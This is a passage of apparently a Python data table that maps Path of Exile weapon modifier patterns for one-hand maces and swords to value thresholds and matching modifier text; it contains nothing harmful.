"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"One Hand Mace": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '1.5% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '0.5% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '(10 - 12) to all Attributes\n(5 - 10)% chance to gain an Endurance Charge on Kill')],
"#% reduced Enemy Stun Threshold": [(30, '(5 - 6)% reduced Enemy Stun Threshold'), (35, '(7 - 8)% reduced Enemy Stun Threshold'), (200, '(9 - 10)% reduced Enemy Stun Threshold')],
"#% reduced Soul Cost of Vaal Skills": [(25, 'Vaal Skills deal (25 - 30)% increased Damage'), (50, 'Vaal Skills deal (31 - 35)% increased Damage'), (100, '(40 - 50)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(25 - 30) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(600, '(7 - 9)% increased Armour'), (1200, '(10 - 12)% increased Armour'), (5000, '(13 - 15)% increased Armour')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(600, '(7 - 9)% increased Evasion Rating'), (1200, '(10 - 12)% increased Evasion Rating'), (5000, '(13 - 15)% increased Evasion Rating')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Melee Gems": [(3, '(2 - 3) to Quality of Socketed Melee Gems'), (5, '(4 - 6) to Quality of Socketed Melee Gems'), (10, '1 to Level of Socketed Melee Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength": [(40, '(6 - 8) to Strength'), (70, '(9 - 11) to Strength'), (100, '(12 - 14) to Strength'), (130, '(15 - 17) to Strength'), (160, '(18 - 20) to Strength'), (200, 'Adds (1 - 2) to (3 - 4) Fire Damage to Attacks with this Weapon per 10 Strength')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to Weapon range": [(7, '1 to Weapon range'), (20, '2 to Weapon range')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(40, '(15 - 17) to Global Critical Strike Multiplier'), (80, '(18 - 20) to Global Critical Strike Multiplier'), (150, '(21 - 23) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(200, 'Adds (4 - 9) to (11 - 21) Chaos Damage'), (320, 'Adds (10 - 18) to (22 - 34) Chaos Damage'), (1000, 'Adds (19 - 28) to (35 - 49) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(60, 'Adds (3 - 5) to (5 - 8) Cold Damage to Spells'), (120, 'Adds (5 - 7) to (9 - 13) Cold Damage to Spells'), (160, 'Adds (8 - 11) to (14 - 19) Cold Damage to Spells'), (180, 'Adds (12 - 14) to (19 - 25) Cold Damage to Spells'), (1000, 'Adds (15 - 18) to (26 - 31) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(75, 'Adds (3 - 6) to (7 - 11) Fire Damage to Spells'), (150, 'Adds (7 - 9) to (12 - 17) Fire Damage to Spells'), (200, 'Adds (10 - 13) to (17 - 22) Fire Damage to Spells'), (230, 'Adds (14 - 17) to (23 - 31) Fire Damage to Spells'), (1000, 'Adds (18 - 21) to (31 - 38) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(100, 'Adds 1 to (12 - 18) Lightning Damage to Spells'), (200, 'Adds (1 - 2) to (19 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 39) Lightning Damage to Spells'), (370, 'Adds (2 - 4) to (40 - 49) Lightning Damage to Spells'), (1000, 'Adds (2 - 5) to (50 - 59) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(40, 'Adds 1 to 2 Physical Damage'), (80, 'Adds (2 - 3) to (3 - 4) Physical Damage'), (120, 'Adds (3 - 4) to (5 - 6) Physical Damage'), (135, 'Adds (5 - 6) to (7 - 8) Physical Damage'), (500, 'Adds (6 - 7) to (9 - 10) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(15 - 17)% increased Chaos Damage'), (44, '(18 - 20)% increased Chaos Damage'), (100, '(21 - 23)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(17 - 19)% increased Elemental Damage'), (44, '(20 - 22)% increased Elemental Damage'), (100, '(23 - 26)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(3, 'You and Allies affected by your Aura Skills deal (7 - 9)% increased Damage'), (5, 'You and Allies affected by your Aura Skills deal (10 - 12)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (13 - 15)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(18 - 20)% increased Chaos Damage'), (22, '(21 - 23)% increased Chaos Damage'), (50, '(24 - 26)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(11, '(21 - 23)% increased Cold Damage'), (22, '(24 - 26)% increased Cold Damage'), (50, '(27 - 30)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(11, '(21 - 23)% increased Lightning Damage'), (22, '(24 - 26)% increased Lightning Damage'), (50, '(27 - 30)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Cold Damage'), (32, '(24 - 26)% increased Cold Damage'), (100, '(27 - 30)% increased Cold Damage\nGain (4 - 6)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Fire Damage'), (32, '(24 - 26)% increased Fire Damage'), (100, '(27 - 30)% increased Fire Damage\nGain (4 - 6)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(16, '(21 - 23)% increased Lightning Damage'), (32, '(24 - 26)% increased Lightning Damage'), (100, '(27 - 30)% increased Lightning Damage\nGain (4 - 6)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(5, '(15 - 17)% increased Chaos Damage'), (10, '(18 - 20)% increased Chaos Damage'), (50, '(21 - 23)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(16, '(19 - 22)% increased Global Physical Damage'), (32, '(23 - 26)% increased Global Physical Damage'), (100, '(27 - 30)% increased Global Physical Damage\nGain (4 - 6)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
"One Hand Sword": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
